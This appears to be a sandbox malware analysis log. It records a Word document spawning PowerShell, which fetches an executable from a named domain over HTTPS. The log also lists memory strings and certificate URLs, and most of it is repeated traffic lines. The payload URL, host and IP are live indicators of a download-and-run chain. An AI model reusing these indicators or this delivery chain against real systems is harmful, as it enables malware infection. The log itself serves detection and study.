Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: Joe Sandbox ViewASN Name: COGENT-174US COGENT-174US
Source: Joe Sandbox ViewJA3 fingerprint: 05af1f5ca1b87cc9cc9b25185115607d
Source: global trafficHTTP traffic detected: GET /file.exe HTTP/1.1Host: thekaribacruisecompany.comConnection: Keep-Alive
Source: unknownHTTPS traffic detected: 149.102.154.62:443 -> 192.168.2.22:49172 version: TLS 1.0
Source: global trafficHTTP traffic detected: GET /file.exe HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: thekaribacruisecompany.comConnection: Keep-Alive
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49172
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49171
Source: unknownNetwork traffic detected: HTTP traffic on port 49172 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49171 -> 443
Source: powershell.exe, 00000006.00000002.911999906.00000000002DA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)
Source: powershell.exe, 00000006.00000002.912596165.00000000035BC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.926461141.00000000035AC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.959457009.000000000385C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: httPs://thekaribacruisecompany.c
Source: powershell.exe, 00000012.00000002.953185169.00000000002CF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: httPs://thekaribacruisecompany.com/file.exe
Source: powershell.exe, 0000000C.00000002.926461141.00000000035AC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: httPs://thekaribacruisecompany.com/file.exePE
Source: powershell.exe, 00000006.00000002.912596165.00000000035BC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.959457009.000000000385C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: httPs://thekaribacruisecompany.com/file.exePEQ
Source: powershell.exe, 00000006.00000002.919745005.000000001B388000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.919745005.000000001B39E000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.911999906.00000000002DA000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.919745005.000000001B37C000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.919745005.000000001B391000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
Source: powershell.exe, 00000006.00000002.919745005.000000001B391000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.entrust.net/2048ca.crl0
Source: powershell.exe, 00000006.00000002.919745005.000000001B39E000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.911999906.000000000024F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.entrust.net/server1.crl0
Source: powershell.exe, 00000006.00000002.919745005.000000001B3A4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: powershell.exe, 00000006.00000002.919745005.000000001B37C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
Source: powershell.exe, 00000006.00000002.919745005.000000001B37C000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.919745005.000000001B391000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.911999906.000000000024F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
Source: file.exe, file.exe, 00000010.00000000.947049391.000000000040A000.00000008.00000001.01000000.00000006.sdmp, file.exe, 00000010.00000002.1283348828.000000000040A000.00000004.00000001.01000000.00000006.sdmp, file.exe, 00000015.00000000.1014911809.000000000040A000.00000008.00000001.01000000.00000006.sdmp, file.exe, 00000015.00000002.1283424107.000000000040A000.00000004.00000001.01000000.00000006.sdmpString found in binary or memory: http://nsis.sf.net/NSIS_Error
Source: file.exe, 00000009.00000002.1283288153.000000000040A000.00000004.00000001.01000000.00000006.sdmp, file.exe, 00000009.00000000.921928467.000000000040A000.00000008.00000001.01000000.00000006.sdmp, file.exe, 00000010.00000000.947049391.000000000040A000.00000008.00000001.01000000.00000006.sdmp, file.exe, 00000010.00000002.1283348828.000000000040A000.00000004.00000001.01000000.00000006.sdmp, file.exe, 00000015.00000000.1014911809.000000000040A000.00000008.00000001.01000000.00000006.sdmp, file.exe, 00000015.00000002.1283424107.000000000040A000.00000004.00000001.01000000.00000006.sdmpString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: powershell.exe, 00000006.00000002.919745005.000000001B39E000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.919745005.000000001B37C000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.919745005.000000001B391000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0
Source: powershell.exe, 00000006.00000002.919745005.000000001B37C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0%
Source: powershell.exe, 00000006.00000002.919745005.000000001B388000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0-
Source: powershell.exe, 00000006.00000002.919745005.000000001B388000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.911999906.00000000002DA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0/
Source: powershell.exe, 00000006.00000002.919745005.000000001B37C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com05
Source: powershell.exe, 00000006.00000002.919745005.000000001B39E000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.911999906.000000000024F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.entrust.net03
Source: powershell.exe, 00000006.00000002.919745005.000000001B391000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.entrust.net0D
Source: powershell.exe, 00000006.00000002.912596165.00000000036B9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.912596165.00000000036DF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://s.symcb.com/universal-root.crl0
Source: powershell.exe, 00000006.00000002.912596165.00000000036B9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.912596165.00000000036DF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://s.symcd.com06
Source: powershell.exe, 00000006.00000002.912596165.00000000036B9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.912596165.00000000036DF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ts-aia.ws.symantec.com/sha256-tss-ca.cer0(
Source: powershell.exe, 00000006.00000002.912596165.00000000036B9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.912596165.00000000036DF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ts-crl.ws.symantec.com/sha256-tss-ca.crl0
Source: powershell.exe, 00000006.00000002.912596165.00000000036B9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.912596165.00000000036DF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ts-ocsp.ws.symantec.com0;
Source: powershell.exe, 00000006.00000002.919745005.000000001B391000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.digicert.com.my/cps.htm02
Source: powershell.exe, 00000006.00000002.919745005.000000001B37C000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.919745005.000000001B391000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.911999906.000000000024F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
Source: powershell.exe, 00000012.00000002.953185169.00000000002CF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.piriform.com/Yg
Source: powershell.exe, 0000000C.00000002.925602681.00000000001B7000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.953185169.00000000002CF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.piriform.com/ccleaner
Source: powershell.exe, 00000006.00000002.912596165.00000000036B9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.912596165.00000000036DF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://d.symcb.com/cps0%
Source: powershell.exe, 00000006.00000002.912596165.00000000036B9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.912596165.00000000036DF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://d.symcb.com/rpa0
Source: powershell.exe, 00000006.00000002.912596165.00000000036B9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.912596165.00000000036DF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://d.symcb.com/rpa0.
Source: powershell.exe, 00000006.00000002.919745005.000000001B388000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.919745005.000000001B39E000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.911999906.00000000002DA000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.919745005.000000001B37C000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.919745005.000000001B391000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://secure.comodo.com/CPS0
Source: powershell.exe, 00000006.00000002.912596165.00000000036B9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.912596165.00000000035BC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://thekaribacruisecompany.com
Source: powershell.exe, 00000006.00000002.912596165.00000000035BC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.919745005.000000001B35A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://thekaribacruisecompany.com/file.exe
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{D69C60B5-B29E-4F37-A352-937B9DD503EB}.tmpJump to behavior
Source: unknownDNS traffic detected: queries for: thekaribacruisecompany.com
Source: global trafficHTTP traffic detected: GET /file.exe HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: thekaribacruisecompany.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /file.exe HTTP/1.1Host: thekaribacruisecompany.comConnection: Keep-Alive
Source: unknownHTTPS traffic detected: 149.102.154.62:443 -> 192.168.2.22:49171 version: TLS 1.2
